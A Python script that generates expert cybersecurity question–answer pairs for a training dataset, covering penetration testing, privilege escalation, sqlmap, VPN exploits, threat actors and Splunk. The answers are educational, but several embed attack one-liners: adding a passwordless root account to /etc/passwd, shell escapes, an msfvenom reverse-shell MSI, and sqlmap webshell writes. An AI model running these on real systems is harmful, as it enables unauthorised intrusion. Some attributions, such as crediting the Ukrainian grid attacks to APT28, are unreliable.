#!/usr/bin/env python3
"""gen_f_fill4.py -- extend upgrade_f.jsonl to 1000+ expert cyber pairs"""
import json, pathlib

OUT = pathlib.Path('/workspace/data_upgrades/upgrade_f.jsonl')
OUT.parent.mkdir(parents=True, exist_ok=True)

pairs = []
def p(q, a):
    pairs.append((q, a))

# ── PENETRATION TESTING METHODOLOGY ─────────────────────────────────────────

p("How do you scope a penetration test engagement?",
  "Scoping defines what will and will not be tested; prevents legal issues and sets expectations. Scope components: (1) In-scope assets: IP ranges, domains, applications, API endpoints, network segments, physical locations; specify explicitly (10.0.0.0/24, app.company.com, mobile app v2.3). (2) Out-of-scope assets: systems too fragile to test (medical devices, OT/SCADA); third-party services not owned by client (AWS infrastructure itself, Cloudflare); shared hosting environments; explicitly list exclusions. (3) Testing types: external perimeter (from internet); internal network (from inside office or VPN); web application; social engineering; physical; cloud; explicitly agree which phases. (4) Testing methods: black-box (no prior knowledge); grey-box (credentials or network access provided); white-box (full documentation, source code, admin access). (5) Authorized testing windows: business hours vs off-hours; change freeze periods; holidays; some tests scheduled during maintenance windows. (6) Rules of Engagement (RoE): emergency contacts (24/7 phone if test causes outage); what to do on finding critical vuln (stop and call? continue?); tools allowed (no DoS tools against production?); geographic restrictions; data handling (no copying customer data). (7) Legal: signed Master Services Agreement (MSA) and Statement of Work (SoW); get-out-of-jail letter listing authorized tester names, test window, and scope; essential for external testers. Deliverables: report format, executive summary, technical findings with CVSS scores, remediation guidance, retest included?")

p("What is the PTES (Penetration Testing Execution Standard)?",
  "PTES (Penetration Testing Execution Standard): comprehensive framework defining phases and technical guidelines for penetration tests. Seven phases: (1) Pre-Engagement Interactions: define scope, objectives, rules of engagement; legal agreements signed; questionnaire to understand environment (OS types, number of hosts, applications); kick-off meeting; NDA signed. (2) Intelligence Gathering: OSINT; passive and active recon; WHOIS, DNS, Google dorks, LinkedIn, Shodan, social engineering recon; map attack surface. (3) Threat Modelling: identify high-value targets; model likely attacker types (insider, external APT, opportunistic criminal); prioritise testing based on threats most relevant to client business. (4) Vulnerability Analysis: scan with Nessus, OpenVAS; manual validation; application testing; service enumeration; correlate findings with threat model. (5) Exploitation: validate vulnerabilities through actual exploitation; establish foothold; use real exploits (Metasploit, manual); document proof of exploitation (screenshot, file read). (6) Post-Exploitation: from compromised system: privilege escalation; lateral movement; persistence; data exfiltration simulation; business impact demonstration. (7) Reporting: executive summary (business language, risk and impact); technical findings (vulnerability details, evidence, CVSS score, remediation); methodology; retest results. PTES Technical Guidelines: detailed guidance on tools and techniques per phase available on ptes.org. OSSTMM (Open Source Security Testing Methodology Manual): alternative; focuses on trust, security, and metrics; more academic approach.")

p("How do you write a penetration test report?",
  "Penetration test report structure: Executive Summary: 1-2 pages; non-technical language; business impact; overall risk rating; key findings summary; remediation priorities; suitable for C-suite and board. Scope and Methodology: what was tested (dates, systems, testing types); what was not tested; testing approach (black/grey/white box, tools used); team composition; any limitations encountered. Risk Rating: overall risk: Critical/High/Medium/Low/Informational; color-coded; methodology for rating (CVSS, DREAD, or custom); summary statistics (X Critical, Y High findings). Findings: for each vulnerability: unique finding ID; title; risk rating with CVSS score; affected systems; description (what is it?); evidence (screenshots, request/response, command output); business impact (what could attacker do?); remediation recommendation (specific, actionable); references (CVE, CWE, OWASP). Remediation roadmap: prioritised list; suggested SLAs (Critical: 7 days; High: 30 days; Medium: 90 days). Appendices: raw scan output; full request/response for web findings; tool commands used; network diagrams. Writing quality: findings must be reproducible from description alone; screenshots should include timestamps and domain; avoid jargon in executive sections; be specific about impact (not just possible data breach -- specify what data, how accessed, regulatory implications). Retest: after remediation, retest to verify fixes; document in addendum or separate retest report.")

p("How do you approach privilege escalation on Linux?",
  "Linux privilege escalation methodology: Enumeration: id (current user and groups); sudo -l (what can current user run as sudo); find / -perm -4000 2>/dev/null (SUID binaries -- run as owner, often root); cat /etc/passwd; cat /etc/shadow (if readable); ls -la /etc/cron* (cron jobs); env (environment variables -- PATH, LD_PRELOAD); cat /proc/1/environ (process 0 environment). SUID exploitation: if SUID binary allows arbitrary code execution or file read: /usr/bin/find -perm /u=s -exec /bin/sh -p ; or GTFOBins (gtfobins.github.io) has SUID exploit one-liners for common binaries (find, vim, nmap, cp, python, perl). Sudo exploitation: sudo -l shows (ALL) NOPASSWD: /usr/bin/vim; use GTFObins sudo vim -c :!/bin/bash to get root shell. Cron jobs: world-writable script called by root cron: replace script with reverse shell; or PATH hijacking in cron -- if cron script calls ls without full path and attacker controls PATH. Writable /etc/passwd: if writable, add new root user: echo hackerx::0:0::/root:/bin/bash >> /etc/passwd; login as hackerx with no password. Weak file permissions: /etc/shadow readable by www-data; crack hashes; writable cron scripts. Kernel exploits: uname -r for kernel version; searchsploit local privilege escalation; DirtyCow (CVE-2016-5195) for older kernels; overlayfs CVE-2023-0386. LD_PRELOAD exploitation: if sudo preserves LD_PRELOAD: compile shared library that spawns shell; sudo LD_PRELOAD=/tmp/evil.so find. Tools: LinPEAS (LinPEAS.sh -- comprehensive auto-enumeration); linux-exploit-suggester (suggest kernel exploits based on version).")

p("How do you approach privilege escalation on Windows?",
  "Windows privilege escalation methodology: Enumeration: whoami /all (user, groups, privileges); systeminfo (OS version, patch level); wmic qfe list brief (installed patches -- find missing); net localgroup administrators (local admin members); wmic product get name,version (installed software with versions). Service exploitation: sc qc SERVICE_NAME (service config including binary path); if binary path writable: replace with malicious executable; or unquoted service path (C:\\Program Files\\My App\\app.exe -- Windows tries C:\\Program.exe, C:\\Program Files\\My.exe first; place executable in those paths). Weak permissions: icacls C:\\path\\to\\service.exe (check if writable by current user); PowerUp: Invoke-AllChecks (PowerSploit -- comprehensive Windows privesc checker). Scheduled tasks: schtasks /query /fo LIST /v | find /i PATH (tasks running as SYSTEM with writable scripts). Token exploitation: if SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege (common for service accounts like IIS, SQL Server): use PrintSpoofer, RoguePotato, SweetPotato, or JuicyPotato to impersonate SYSTEM token. AlwaysInstallElevated: if policy set, MSI packages install with SYSTEM; msfvenom -p windows/x64/shell_reverse_tcp ... -f msi -o evil.msi; msiexec /quiet /qn /i evil.msi. DLL hijacking: Windows searches PATH for DLLs; if directory in search path writable: place malicious DLL with expected name; application loads malicious DLL. UAC bypass: fodhelper.exe registry hijack; CMSTPLUA COM object; eventvwr.exe; rundll32 ShellExec_RunDLL; auto-elevating binaries that read from user-writable locations. Tools: WinPEAS.exe; PowerUp.ps1; SharpUp.exe; Seatbelt.exe.")

p("How do you use sqlmap for automated SQL injection testing?",
  "SQLmap: automated SQL injection detection and exploitation tool. Basic usage: sqlmap -u http://target.com/page?id=1 (test GET parameter); sqlmap -u http://target.com/page --data=id=1 (POST parameter); sqlmap -r request.txt (Burp-exported raw request -- handles any HTTP method and complex requests). Detection: sqlmap tests boolean-based, error-based, UNION-based, time-based blind, and stacked query injection; --level=5 --risk=3 (maximum coverage, more aggressive payloads); --dbms=mysql (hint database type to reduce payloads). Authenticated testing: --cookie=PHPSESSID=abc123 (session cookie); or --headers=Authorization: Bearer TOKEN. Database enumeration: --dbs (list all databases); --tables -D database_name (list tables); --columns -D db -T table (list columns); --dump -D db -T users (dump table); --dump-all (dump everything -- careful on production). OS and file operations (if DBA privileges): --os-shell (interactive OS shell via SQL injection -- requires FILE privilege); --file-read=/etc/passwd (read file via SQL); --file-write=shell.php --file-dest=/var/www/html/shell.php (write webshell). WAF bypass: --tamper=space2comment (replace spaces with SQL comments); --tamper=between (replace > with BETWEEN); --random-agent (random User-Agent); --delay=1 (slow down to avoid rate limiting); --tor (route through Tor). HTTPS and cookies: --ignore-proxy for direct connections; specify SSL cert if needed. Dumping hashes: if users table contains hashes, sqlmap --dump -D app -T users and --passwords will attempt to crack hashes automatically.")

p("Explain the concept of threat modeling and how to perform it.",
  "Threat modeling: structured process to identify security threats, prioritise them, and determine mitigations. Why: catching security issues at design phase is 10-100x cheaper than post-deployment. STRIDE model (Microsoft): Spoofing (impersonating another user or component); Tampering (modifying data in transit or at rest); Repudiation (denying having performed an action); Information Disclosure (exposure of sensitive data); Denial of Service (making system unavailable); Elevation of Privilege (gaining higher permissions). Process: (1) Define scope: what system? What are we protecting? What are the valuable assets and entry points? (2) Create data flow diagram (DFD): model how data flows through system; external entities (users, external services); processes; data stores; trust boundaries (dotted lines where privilege changes -- internet to DMZ, DMZ to internal). (3) Identify threats: for each element and trust boundary, apply STRIDE; brainstorm threats; PASTA (Process for Attack Simulation and Threat Analysis) alternative. (4) Rate and prioritise threats: DREAD (Damage, Reproducibility, Exploitability, Affected users, Discoverability) -- 1-10 scale; or CVSS-like scoring; prioritise high-risk threats. (5) Mitigations: for each threat, design control: authentication (spoofing), integrity checks/signing (tampering), audit logging (repudiation), encryption (disclosure), rate limiting/availability architecture (DoS), least privilege (EoP). (6) Validate: were mitigations implemented? Retest in next iteration. Tools: Microsoft Threat Modeling Tool (auto-generates STRIDE threats from DFD); OWASP Threat Dragon; draw.io for DFDs.")

p("How do you test a thick client application?",
  "Thick client (desktop application) security testing: architecture types: two-tier (client connects directly to database); three-tier (client connects to application server, which connects to database). Traffic interception: identify protocols used (HTTP/S, proprietary TCP, named pipes, COM, WCF); HTTP: configure Burp proxy; non-HTTP: use Echo Mirage or Wireshark to capture; Java RMI: intercept RMI traffic; .NET remoting or WCF: intercept with Wireshark or WireShark + SSL decryption. Memory analysis: Process Hacker (view process memory strings); attach to process with OllyDbg or x64dbg; strings in memory may reveal credentials, keys, business logic. Binary analysis: string extraction (strings.exe or PEStudio on Windows); decompilation: .NET binaries: dotPeek, dnSpy, JetBrains dotPeek -- view almost original C# source; Java: JAD, Procyon, Recaf; obfuscated binaries: Ghidra, IDA Pro, Binary Ninja for reverse engineering. Local storage: files created by application (AppData, ProgramData, temp); registry keys (HKCU, HKLM); SQLite databases; credential storage (DPAPI protected files, Credential Manager). Functionality testing: input validation (same attacks as web: SQLi, XSS in rendered HTML, command injection); business logic (can user access another user data?); authentication (remember-me tokens stored securely?); update mechanism (is update signed? MITM possible to inject malicious update?). DLL hijacking: identify DLLs loaded by application; check if writable path in DLL search order; plant malicious DLL for privilege escalation. Automation tools: MITM Proxy for HTTP; API Scanner for REST APIs; Wireshark + ssldump for TLS inspection.")

p("How do you secure an API and what vulnerabilities to test for?",
  "API security testing checklist: (1) Authentication: is authentication required for all sensitive endpoints? Test removing Authorization header; test with invalid/expired tokens; JWT vulnerabilities (alg:none, weak secret, jku injection). (2) Authorisation: IDOR -- change object IDs to other user IDs; test object-level (BOLA) and function-level (BFLA) access control; tenant isolation in multi-tenant APIs. (3) Rate limiting: brute-force login endpoint; send 1000 requests rapidly; should get 429; test distributed rate limiting (same request from different IPs). (4) Input validation: inject SQLi, XSS, command injection in all parameters; test with special characters in strings; integer overflow for numeric fields; nested JSON/XML for injection. (5) Excessive data exposure: does API return more fields than needed? Filter on client-side vs server-side; look for hidden fields in response (internal IDs, system fields, other user data). (6) Mass assignment: send extra fields in POST/PUT body that should not be user-settable; role=admin, verified=true, balance=9999. (7) Security headers: CORS misconfiguration (Access-Control-Allow-Origin: * with credentials); X-Content-Type-Options; Content-Security-Policy for APIs returning HTML. (8) Sensitive data in transport: PII in query string (gets logged); tokens in URL; check all responses for secrets. (9) API versioning: test old API versions (v1 may lack security controls added in v2); deprecated endpoints. (10) GraphQL specific: introspection enabled; batching attacks; depth limiting; SSRF via queries. Tools: Burp Suite; Postman for functional + security; OWASP ZAP; Arjun (hidden parameter discovery); Swagger UI + API fuzzing with Restler or CATS.")

p("How do you test mobile deep links and URL scheme vulnerabilities?",
  "Deep link security testing: deep links and URL schemes allow external apps and web pages to open specific app screens. Android Intent filters: defined in AndroidManifest.xml: <intent-filter><action android:name='android.intent.action.VIEW'/><data android:scheme='myapp' android:host='open'/></intent-filter>; accessible from any app on device or via web page. Testing: enumerate all URL schemes and deep links in AndroidManifest.xml or iOS Info.plist; test each with ADB: adb shell am start -W -a android.intent.action.VIEW -d 'myapp://open?redirect=https://attacker.com' com.target.app; check if deep link parameters are validated. Vulnerabilities: (1) Unvalidated redirect: myapp://login?redirect=https://attacker.com; after auth, redirects externally; open redirect via deep link. (2) XSS via deep link: myapp://webview?url=javascript:alert(1); if WebView loads URL from deep link parameter. (3) Fragment injection: myapp://settings?fragment=../admin; if app loads Fragment based on parameter, can access any Fragment regardless of auth. (4) Deeplink parameter injection into WebView: myapp://page?param=<script>; if param is directly rendered in WebView HTML. (5) Task hijacking: Android intent task affinity attack; malicious app with same task affinity intercepts deep link handling; allowTaskReparenting exploit. (6) iOS Universal Links (HTTPS-based): more secure; require server-side apple-app-site-association JSON file verification; fallback to web page if app not installed. Testing tools: Frida hooks to intercept deep link handling; logcat for debug output; Android Activity Inspector; iOS URL Scheme Fuzzer.")

# ── ADVANCED NETWORK SECURITY ─────────────────────────────────────────────────

p("What is BGP hijacking and how does it work?",
  "BGP (Border Gateway Protocol) is the routing protocol of the internet; connects Autonomous Systems (AS); based on trust -- ASes announce which IP prefixes they own; no cryptographic validation in original BGP. BGP hijacking: attacker announces IP prefix belonging to someone else; routers accept most specific or shortest AS path advertisement; traffic destined for victim IP routed to attacker instead. Types: (1) Prefix hijacking: attacker AS announces entire prefix owned by victim (e.g., announces 8.8.8.0/24 -- Google DNS); may receive some traffic depending on routing topology. (2) More specific prefix: announce more specific prefix (8.8.8.0/25 covers half of 8.8.8.0/24); routers prefer more specific routes; attacker captures all traffic to that half. (3) AS path manipulation: insert victim AS in path to create shorter apparent path; routers may prefer. Impact: intercept email (Amazon Route 53 BGP hijack 2018 -- attackers rerouted MyEtherWallet DNS traffic); denial of service; traffic analysis and decryption. Real incidents: Pakistan Telecom (2008) accidentally hijacked YouTube; China Telecom (2010, 2019) controversially rerouted US traffic through China; KrebsOnSecurity DDoS mitigation (attacker withdrew Prolexic routes). Detection: BGPmon; RIPE NCC BGP route monitoring; IRR (Internet Routing Registry) inconsistency alerts; RTBH (Remotely Triggered Black Hole) filtering. RPKI (Resource Public Key Infrastructure): cryptographic certificates attest which AS is authorised to announce each prefix; Route Origin Authorisation (ROA) signed by prefix owner; BGP routers with RPKI validation reject invalid announcements; adoption increasing but not universal; fully deployed RPKI would prevent most hijacks.")

p("How do you attack Bluetooth devices?",
  "Bluetooth attack surface: classic Bluetooth (BR/EDR for audio, file transfer) and BLE (Bluetooth Low Energy for IoT, fitness, proximity). Reconnaissance: hcitool scan (classic BT device discovery); hcitool lescan (BLE discovery); btlejack (BLE sniffing without prior knowledge of device); bluehydra (passive BT device discovery via monitoring). RFCOMM attacks: rfcomm connect TARGET_MAC CHANNEL (connect to SPP serial port profile; may not require pairing depending on device). SDP enumeration: sdptool browse TARGET_MAC (list supported Bluetooth profiles -- headsets, file transfer, serial port). Classic BT vulnerabilities: Blueborne (2017, CVE-2017-0781): remote code execution via BlueBorne vulnerabilities in Bluetooth stack of Android, Linux, iOS, Windows; no pairing required; worm-capable; most patched. KNOB (Key Negotiation of Bluetooth, CVE-2019-9506): downgrade encryption key entropy to 1 byte; brute-forceable; affects all BR/EDR devices; patch requires minimum key length. BLE vulnerabilities: GATT (Generic Attribute Profile) services often lack authentication; read/write characteristics without pairing; PoCs exist for popular IoT devices. Sweyntooth (2020): 11 BLE stack vulnerabilities in SoC vendors; deadlock, crash, or bypass pairing; affected pacemakers, blood glucose monitors, smart locks. Wiretapping: btsniffer; Wireshark with BTSnoop log; capture unencrypted BLE advertising and data packets; some BLE devices transmit medical data unencrypted. Tools: GATTacker (BLE MITM); Bettercap (BLE enumeration and exploitation); scapy with bluetooth module; Ubertooth One (hardware for promiscuous BT sniffing).")

p("How do you perform network traffic analysis to find anomalies?",
  "Network traffic analysis (NTA) for security: Capture sources: NetFlow/IPFIX (5-tuple metadata from routers/switches -- efficient, long retention, no payload); Zeek (open-source network analysis framework -- creates structured logs from PCAP: conn.log, dns.log, http.log, ssl.log, files.log, x509.log); PCAP (full packet capture -- high storage, complete analysis). Key Zeek logs: conn.log: source/dest IP, port, protocol, bytes, duration, connection state; dns.log: all DNS queries and responses -- detect C2, DGA, tunneling; http.log: HTTP requests with URIs, host, user-agent, response codes; ssl.log: TLS connections with server name (SNI), certificate, JA3 hash; files.log: file transfers with MD5/SHA1 hashes -- detect malware downloads; weird.log: protocol anomalies. JA3/JA3S fingerprinting: hash of TLS ClientHello/ServerHello fields; same TLS client produces same JA3 regardless of server; known malware JA3 hashes in threat intel; detect Cobalt Strike (JA3: 72a7c13d8cc8cbc4e69a1f1e14d9ae9f), Metasploit, custom RATs. Beaconing detection: RITA (Real Intelligence Threat Analytics): analyses Zeek conn.log; scores connections by beacon regularity, skew, duration, byte consistency; identifies C2 communication. Anomaly detection: DNS queries to high-entropy domains (DGA detection); large DNS responses (tunneling); unusual protocol on standard port (SSH over port 443 vs legitimate HTTPS); certificate anomalies (self-signed, expired, suspicious CN); high-volume connections to single destination (data exfiltration). Tools: Security Onion (all-in-one platform: Zeek, Suricata, Elastic/Kibana, Rita); Elastic Stack with Zeek beats; Splunk stream for network data.")

p("Explain wireless intrusion detection and prevention systems.",
  "Wireless IDS/IPS (WIDS/WIPS): detect and prevent unauthorized wireless activity. What to detect: rogue access points (unauthorized APs on corporate property using corporate network name or mimicking infrastructure); evil twin attacks (attacker AP with same SSID as legitimate); ad-hoc networks (peer-to-peer connections bypassing network controls); deauthentication floods (DoS -- attacker sends disassociation frames to disconnect clients); client anomalies (clients associating with unknown APs; clients probing for non-corporate SSIDs revealing home/travel network names). Detection methods: active scanning: WIDS sensor uses a radio to continuously scan all channels; detects APs and clients; compares against whitelist of known infrastructure; flags unknown APs. Passive monitoring: dedicated monitor mode interface; captures all 802.11 frames; detects management frame anomalies; correlates beacon, probe, association frames. Fingerprinting: identify AP and client by MAC OUI, supported rates, probe SSIDs, frame sequences; difficult to spoof perfectly. WIPS response: automatic deauthentication of rogue clients (controversial -- may interfere with legitimate networks); alert to security team; port-level shutdown if rogue AP plugged into wired network. 802.11w (Management Frame Protection, MFP): cryptographically signs management frames (deauth, disassociation); prevents deauth attacks; supported in WPA3 (mandatory) and WPA2 (optional). Products: Cisco Wireless (integrated WIPS with controller-based architecture); Cisco Meraki; Extreme Networks; Zebra/Motorola AirDefense; open-source: Kismet (passive WIDS). Zero-trust wireless: assume wireless is hostile; require VPN even on corporate WiFi; authenticate at application layer; segment wireless clients from internal network.")

p("How does TLS 1.3 improve security over TLS 1.2?",
  "TLS 1.3 (RFC 8446, 2018) improvements over TLS 1.2: (1) Removed weak cipher suites: eliminated all CBC cipher suites (BEAST, POODLE vulnerable); removed RC4, 3DES, DES, MD5; only AEAD ciphers allowed: AES-128-GCM, AES-256-GCM, ChaCha20-Poly1305; removed RSA key exchange (no PFS); removed DHE (only ECDHE). (2) Mandatory Forward Secrecy: only ECDHE key exchange; every session has fresh ephemeral keys; past sessions cannot be decrypted even with private key compromise. (3) Faster handshake: TLS 1.2: 2 round trips before application data; TLS 1.3: 1 round trip (1-RTT); 0-RTT resumption (send data in first message using session ticket -- but replay attacks possible; use only for idempotent requests). (4) Removed vulnerable features: no renegotiation (TLS renegotiation attacks); no compression (CRIME attack); no export-grade cryptography; no RSA PKCS#1 v1.5 (ROBOT attack). (5) Improved certificate handling: OCSP stapling required; reduced reliance on client certificate verification round-trips. (6) Encrypted handshake: certificate and extensions encrypted earlier in handshake than TLS 1.2; less metadata visible to passive observer. Challenges: middlebox compatibility: corporate TLS inspection proxies often break TLS 1.3 (cannot decrypt due to PFS); many enterprises still filter HTTPS by downgrading to TLS 1.2; ECH (Encrypted Client Hello) further hides SNI from network observers. Enabling TLS 1.3: Nginx: ssl_protocols TLSv1.2 TLSv1.3; OpenSSL 1.1.1+ required; Apache: SSLProtocol all -SSLv3 -TLSv1 -TLSv1.1.")

p("What is DNSSEC and how does it work?",
  "DNSSEC (DNS Security Extensions): adds cryptographic signatures to DNS records to ensure authenticity and integrity. Problem it solves: DNS responses can be spoofed (cache poisoning, BGP hijacking); no way to verify response came from authoritative server and was not tampered with. How it works: each DNS zone has a key pair; Zone Signing Key (ZSK) signs all resource records (A, MX, CNAME, etc.); Key Signing Key (KSK) signs the ZSK; creates chain of trust from root zone downward. Record types: DNSKEY: contains public key(s) for zone; RRSIG: cryptographic signature over a set of resource records (signed with ZSK); DS (Delegation Signer): hash of child zone DNSKEY; stored in parent zone; links trust from parent to child; NSEC/NSEC3: authenticated denial of existence (proves a name does not exist). Validation chain: resolver starts at root zone (implicitly trusted -- 13 root key operators); root DS points to .com ZSK; .com DS points to example.com ZSK; resolver validates RRSIG on every DNS response using DNSKEY. DNSSEC deployment: root zone signed since 2010; most TLDs signed; major ISP resolvers validate DNSSEC; enables DANE (DNS-based Authentication of Named Entities) for certificate pinning via TLSA records; DoH (DNS-over-HTTPS) encrypts DNS queries but DNSSEC validates authenticity; complementary. Limitations: does not encrypt DNS queries (only authenticates); complex to manage zone signing; key rollovers require careful coordination; zone enumeration with NSEC (NSEC3 with opt-out mitigates); software complexity introduced bugs (BIND vulnerabilities in DNSSEC validation).")

p("Explain common attack techniques against VPNs.",
  "VPN attack surface and exploitation techniques: (1) Authentication attacks: IPsec/IKEv1 aggressive mode: pre-shared key hash exposed without authentication; crack hash offline (ike-scan, psk-crack); eliminate by requiring certificates or IKEv2. SSL VPN login brute force: if no lockout or rate limiting on portal login; Hydra, Burp Intruder. Password spraying against ActiveDirectory-integrated VPN: one attempt per user per lockout period. (2) Vulnerability exploitation: Pulse Secure (CVE-2019-11510): unauthenticated arbitrary file read; read /etc/passwd and VPN session files; extract user passwords; widely exploited by APT groups. Citrix ADC (CVE-2019-19781): directory traversal RCE; no authentication required; Shodan showed 80,000 vulnerable systems. Fortinet FortiOS (CVE-2018-13379): unauthenticated SSL VPN path traversal; read sslvpn_websession files containing cleartext credentials. Palo Alto GlobalProtect (CVE-2024-3400): unauthenticated OS command injection; CVSS 10.0; exploited in the wild as zero-day. (3) Split tunneling exploitation: if VPN uses split tunneling (only certain traffic through VPN), attacker on same network segment as VPN client can access client via non-VPN interface; reach internal resources the VPN client can access. (4) Post-compromise: once VPN gateway compromised: dump active session database (usernames, auth tokens); move laterally to internal network; install persistent backdoor. (5) Certificate validation: if VPN client does not validate server certificate: fake VPN server, capture credentials. Defense: MFA on VPN; certificate-based auth; patch immediately (VPN vulns are high-value targets); monitor for unusual connection volumes; ZTNA replacing traditional VPN.")

# ── THREAT ACTORS & APT ────────────────────────────────────────────────────────

p("Explain the APT28 (Fancy Bear) threat actor group.",
  "APT28 (Fancy Bear, Sofacy, Pawn Storm, Sednit, Strontium): Russian GRU (military intelligence) Unit 26165 and 74455 sponsored threat actor. Active since at least 2004; one of most sophisticated and prolific APT groups. Notable operations: 2016 US Presidential Election: spearphishing attacks on DNC, DCCC, Clinton campaign staff; compromised John Podesta Gmail (spearphishing via Google Docs link); Guccifer 2.0 front released stolen documents; Mueller indictment named 12 GRU officers. 2014-2017 Ukraine: BlackEnergy/Industroyer attacks on Ukrainian power grid (2015, 2016 blackouts); Olympic Destroyer (2018 Pyeongchang) false flag. German Bundestag (2015): compromised parliamentary networks; exfiltrated data. MH17 disinformation: hacked Bellingcat researchers. TTPs: initial access via spearphishing (Fancy Bear favors credential harvesting pages mimicking Google, Microsoft login); zero-day exploits; custom malware: X-Agent (cross-platform implant for Windows, macOS, Linux, iOS, Android), X-Tunnel, Sofacy/GAMEFISH, LoJax (UEFI rootkit -- first in wild); living-off-the-land (PowerShell, WMI); Tor for C2; credential harvesting via MiMiKatz; lateral movement via PtH. Industry tracking: APT28 by Mandiant; Fancy Bear by CrowdStrike; Sofacy by Kaspersky/ESET; Strontium by Microsoft; Pawn Storm by Trend Micro -- same group. Detection: X-Agent indicators (specific registry keys, mutex names); GAMEFISH network signatures; UEFI scanning for LoJax; spearphishing domain patterns.")

p("What is the Lazarus Group and what are their notable attacks?",
  "Lazarus Group: North Korean state-sponsored threat actor attributed to DPRK Reconnaissance General Bureau; financially motivated (cryptocurrency theft to fund DPRK programs) and espionage/sabotage. Notable attacks: Sony Pictures (2014): destroyed infrastructure (Shamoon-like wiper malware), leaked films, emails; damage $35M+; retaliation for film mocking Kim Jong-un. Bangladesh Bank Heist (2016): compromised Bangladesh Bank SWIFT network; submitted fraudulent $951M transfer requests; $81M stolen before detected. WannaCry (2017): global ransomware outbreak; 200,000+ systems in 150 countries; NHS UK severely impacted; exploited EternalBlue (NSA-developed SMB exploit); blamed on Lazarus by US, UK, Australia. Crypto exchange thefts ($2B+ total): AppleJeus supply chain attack (fake trading app); Axie Infinity Ronin bridge hack ($625M, 2022); Harmony bridge hack ($100M, 2022). Sub-groups: Bluenoroff (financial theft, SWIFT attacks); Andariel (espionage, destructive attacks on South Korea); Hidden Cobra (US government name). TTPs: spearphishing with malicious documents (macro-laden Word docs); LinkedIn fake job offer social engineering; custom malware (FALLCHILL, HARDRAIN, BADCALL, AppleJeus); watering hole attacks; SWIFT manipulation via custom malware injected into legitimate SWIFT Alliance software; cryptocurrency mixing for money laundering (Tornado Cash, ChipMixer). Detection: unique malware families; DPRK-specific network infrastructure; fake crypto/DeFi applications targeting financial professionals.")

p("Explain the FIN7 cybercrime group and their operations.",
  "FIN7 (also Navigator, Carbanak, Carbon Spider): sophisticated financially motivated cybercrime group; responsible for $1B+ in theft from financial institutions and retail. Operations: targeted banks and payment card processors globally with Carbanak malware (2013-2018): compromised bank employee workstations, recorded screen activity at ATMs, manipulated SWIFT transfers, instructed ATMs to dispense cash on demand; ~100 financial institutions in 30 countries; $900M+ stolen. Retail targeting: restaurant chains, hotel chains (Applebee's, Chili's, Arby's, Saks Fifth Avenue, Jason's Deli, Noodles & Company, Red Robin); compromised POS (Point of Sale) systems; exfiltrated payment card data; created payment card shop to monetise; millions of cards stolen. TTPs: initial access: highly targeted spearphishing to restaurant/hotel managers; subject lines: complaint about food, job application, catering inquiry; malicious attachments (macro Word docs, .LNK files with obfuscated commands); custom tools: CARBANAK/ANUNAK backdoor (sophisticated, persistent, screen capture, video recording); BATELEUR (JavaScript backdoor); GRIFFON (lightweight JavaScript RAT); Cobalt Strike for post-exploitation; very patient -- months of reconnaissance before monetisation; clear escalation path from initial access to domain admin. Law enforcement: 2018 three Ukrainian nationals arrested; 2020 two more arrested; one extradited to US; multiple members still operating. Defense lessons: anomalous RDP connections from server; ATM software changes; unusual outbound connections from payment processing systems; phishing simulation training.")

p("How do you identify and attribute a threat actor?",
  "Threat actor attribution: process of identifying who is responsible for a cyber attack. Levels: tactical (who is currently attacking?), operational (same actor as previous campaign?), strategic (nation-state or criminal? what is their goal?). Attribution evidence: Technical indicators: unique malware code reuse across campaigns (code similarities, shared libraries, same obfuscation technique, mutex names); infrastructure overlaps (same IP, domain, ASN used in multiple campaigns); TTPs (specific attack chain, tooling, exploits preferred by actor); timing patterns (working hours, holidays consistent with a timezone or specific country). Linguistic analysis: error messages, comments in code, keyboard layout artifacts (Cyrillic key slip), compilation metadata. Operational security mistakes: developers log into personal accounts from malware C2 infrastructure; use of personal email in domain registration; metadata in documents (author name, organisation); geolocation of login activity. Diamond Model: adversary (who) + capability (what tools) + infrastructure (where) + victim (who targeted) = complete picture for attribution. Challenges: false flags (attackers plant evidence pointing to other actors; Olympic Destroyer used North Korean-looking code but attributed to Russia); shared tools (criminal and state actors use same commercial tools -- Cobalt Strike, Metasploit; undermines tool-based attribution); proxy infrastructure (VPNs, Tor, hacked third-party servers); intelligence gaps (classified human intelligence often drives government attribution). Standards: STIX 2.1 Intrusion Set for expressing attribution; MITRE ATT&CK groups for public attribution; Mandiant, CrowdStrike, and government agencies publish attribution reports with varying evidence levels. Legal standard vs intelligence standard: beyond reasonable doubt (criminal prosecution) vs more likely than not (intelligence assessment).")

# ── SECURITY OPERATIONS ────────────────────────────────────────────────────────

p("How do you configure and use Splunk for security monitoring?",
  "Splunk SIEM configuration for security operations: Data ingestion: universal forwarder installed on every endpoint; syslog for network devices and Linux; Heavy forwarder for high-volume sources; Splunk Connect for Kubernetes; Windows Event Logs: Security, System, Application, PowerShell; Sysmon: detailed process, network, registry events; add-ons (TAs) normalize data to Common Information Model (CIM). Search Processing Language (SPL): index=windows EventCode=4624 Logon_Type=3 | stats count by src_ip dest_ip Account_Name | sort -count; rex for regex extraction; eval for computed fields; rex field=message \"Audit (?P<action>\\w+)\"; tstats for accelerated search on large datasets; join, append for combining datasets. Alerts: savedsearches.conf or GUI; scheduled search + threshold trigger (count > 10 in 5 min); real-time alerts; action: email, webhook (PagerDuty, Jira), run script (automated response). Notable alerts: Splunk Enterprise Security (ES) creates Notable Events in Incident Review; analyst reviews, assigns, investigates; risk scoring accumulates risk per user or system. Key security searches: 4625 (failed logon) by user: failed logons by user -- find password spray (many users same source); 4724 (password reset) spike; 7045 (service install) -- new services (malware persistence); DNS to high-entropy domain: index=dns | eval domain_len=len(query) | where domain_len > 50; baseline deviation: sourcetype=WinEventLog:Security EventCode=4624 | timechart span=1h count | anomalydetection. Dashboards: SOC dashboard with key metrics; per-analyst incident queue; threat hunting dashboard. Common add-ons: Splunk ES; Splunk ITSI; TA-Windows; TA-Sysmon; TA-CrowdStrike; TA-Palo Alto.")

p("Explain how to use the MITRE ATT&CK framework for detection engineering.",
